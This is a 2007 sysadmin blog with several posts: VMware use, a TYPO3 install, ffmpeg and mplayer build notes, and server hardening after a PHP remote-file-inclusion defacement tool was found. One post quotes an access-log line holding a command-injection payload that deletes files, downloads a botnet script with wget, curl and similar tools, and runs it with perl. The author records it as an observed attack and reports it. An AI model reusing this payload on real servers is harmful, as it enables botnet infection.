Friday, July 13, 2007

We use vmware to escape spyware , to run ubuntu and then kubuntu
in parallel machines and without adware
When memory is small is time for xubuntu , also sometime
we try gobuntu.
Is like running an os in an bottle , viruses can't escape if you try windows vm
is good to reduce the number of servers needed for testing, and trying new stuff (ubuntu gutsy gibbon) or weird operating systems reactos , vista
or antique stuff : redhat, or centos
with vmware server we run many operating systems in parallel , each os distributed for one cpu
is good also for migrations from windows to linux and running both
just one good step to world domination and and fixing the bug #1

Thursday, July 12, 2007

installing typo3 - 4.0.x with ftp
In order to set up a new site, you will need to combine both, the source AND the dummy package by extracting them to the same folder.)

download the dummy with source zip

Run these commands as root in the dummy directory:

# chmod -R g+w,o-rwx fileadmin typo3conf typo3temp uploads

upload files with ftp (ftp in my case)

7 In your browser, visit

8 Follow the instructions in the 1-2-3 install tool

9 From this point, you can access the backend through
with the username "admin" and password "password". Packages

technorati tags:, , , ,

Blogged with Flock

3gp, 2gp , mp4 conversion issues with ffmpeg

ffmpeg accepts only encoding 3gp , 2gp , mp4 files (E- means encoding D-deconding)
ffmpeg -formats | grep 3gp

E 3g2 3gp2 format
E 3gp 3gp format
DE amr 3gpp amr file format
D mov,mp4,m4a,3gp,3g2,mj2 QuickTime/MPEG4/Motion JPEG 2000 format
ffmpeg -formats | grep mp4

E mp4 mp4 format
E psp psp mp4 format

so it is needed that mencoder to be used to decode the
3gp,2gp,mp4 files

mencoder example.3g2 -nosound -ovc lavc -lavcopts
vcodec=mpeg4 -o example.avi
mplayer -vo null -ao pcm -af
resample=8000,volume=+4db:sc example.3g2
ffmpeg -i example.avi -i audiodump.wav example.flv

Wednesday, July 11, 2007

grep cmd access.log
Today i was inspecting the logs - - [11/Jul/2007:03:20:43 -0400] "GET /fooo.php?fooo=;rm%20-rf%20botnet*;wget%20;lwp-download%20;fetch%20;curl%20-o%20botnet.txt%20;GET%20>botnet.txt;lynx%20-source%20>botnet.txt;perl%20botnet.txt;rm%20-rf%20botnet.txt* HTTP/1.1" 200 4812 "-" "Mozilla/3.0 (compatible; Indy Library)"

you can see the php code here
and irc perl bot is here

Now i inform the freewebs about this hosting of the evil scripts
mplayer/ffmpeg conversion issues (compressed swf and h264)
In this part i solved some issues with decoding/encoding

1.added support for h264
# svn co svn:// x264
cd x264
./configure --prefix=/usr
make ; make install
2 wget
tar -zxvf faad2_2.5.orig.tar.gz
cd faad2-2.5/
./configure --prefix=/usr; make ; make install
3.added support in configure script for x264 and theora(ffmpeg)
apt-get install libtheora

svn checkout svn:// ffmpeg
./configure --prefix=/usr --enable-libamr-nb --enable-libamr-wb --enable-libogg --enable-libvorbis --enable-libgsm --enable-libxvid --enable-liba52 --enable-libmp3lame --enable-libx264 --enable-libtheora --enable-libfaad --enable-gpl --enable-shared --enable-pthreads --enable-swscaler
4. found the issue with the compiled swf
5.recompiled mplayer/mencoder from svn
svn checkout svn:// mplayer
cd mplayer
./configure --prefix=/usr
make; make install

Tuesday, July 10, 2007

we secured one server for an annonymous client

The ISC handler mailbox has received multiple reports of web site defacement attempts apparently using the "Defacing Tool 2.0 by r3v3ng4ns" suite of php based scripts intended to deface websites leveraging PHP remote file inclusion
[The box i found this tool was an old rh8.0 box with default php and httpd and allow_url_fopen on !!, solution was to compile all the newest and the greatest stable versions that works for that site
httpd-2.2.4 (latest recomeded)
tomcat-connectors-1.2.23 (mod_jk)

I  work now to upgrade  openssh to newest version
ssh should only permit access with ssh_key and not with the plain text like is configured now and access should be restrincted to a few users 
I will  continue after that with aide installation and log monitoring.
 then will install mod_security after all

SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

technorati tags:, , , , , , , , ,

Blogged with Flock

Wednesday, July 04, 2007

compiling ffmpeg (and mplayer) with amr7 support
apt-get install libgsm1-dev toolame libgsm1-dev libvorbis-dev libogg-dev
apt-get install libfaad2-dev
apt-get install subversion
apt-get install libgsm1-dev libgsmme-dev
apt-get install unzip
apt-get install liba52-0.7.4-dev
apt-get install patch

tar -jxf xvidcore-1.1.2.tar.bz2
tar -zxvf lame-3.97.tar.gz
cd lame-3.97
./configure --prefix=/usr;make;make install
cd ..
cd xvidcore-1.1.2/build/generic/
./configure --prefix=/usr;make;make install
cd ../../../

svn checkout svn:// ffmpeg
cd ffmpeg/libavcodec/
mkdir amrwb_float
cd amrwb_float
cd ..
mkdir amr_float
cd amr_float
cd ../../
tar -jxvf amrwb-
cd amrwb-
./configure --prefix=/usr ; make ; make install
tar -jxvf amrnb-
cd amrnb-
./configure --prefix=/usr ; make ; make install

./configure --prefix=/usr --enable-libamr-nb --enable-libamr-wb --enable-libogg --enable-libvorbis --enable-libgsm --enable-libxvid --enable-liba52 --enable-libmp3lame --enable-gpl;
make ; make install
cd ..
tar -jxvf essential-20061022.tar.bz2
mkdir /usr/lib/codecs/
cd essential-20061022
mv * /usr/lib/codecs/
cd ..
cd MPlayer-1.0rc1/
./configure --prefix=/opt/mplayer
make; make install